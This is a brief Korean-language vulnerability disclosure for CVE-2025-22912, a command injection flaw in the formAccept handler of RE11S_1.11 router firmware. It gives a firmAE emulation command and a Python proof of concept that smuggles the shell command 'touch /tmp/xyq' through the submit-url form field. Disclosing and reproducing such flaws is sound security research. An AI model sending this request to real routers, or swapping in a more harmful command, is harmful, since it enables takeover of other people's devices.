
CVE-2025-22912
Qi An Xin Tiangong Lab에서 인턴십을 하는 동안 RE11S_1.11 라우터에서 명령 주입 취약점을 발견했습니다.
bin 디렉터리의 webs 파일을 분석한 결과, formAccept 함수에 명령 주입 취약점이 포함되어 있음을 발견했습니다.
명령 주입은 submit-url 키 값에 의해 트리거될 수 있으며, 이로 인해 시스템 명령 주입이 발생합니다.

firmAE로 시뮬레이션하려면 다음 명령을 사용하세요.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
poc.py 파일의 내용은 다음과 같습니다:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

실행 후 /tmp/xyq 파일이 생성된 것을 확인할 수 있으며, 이는 공격이 성공했음을 증명합니다.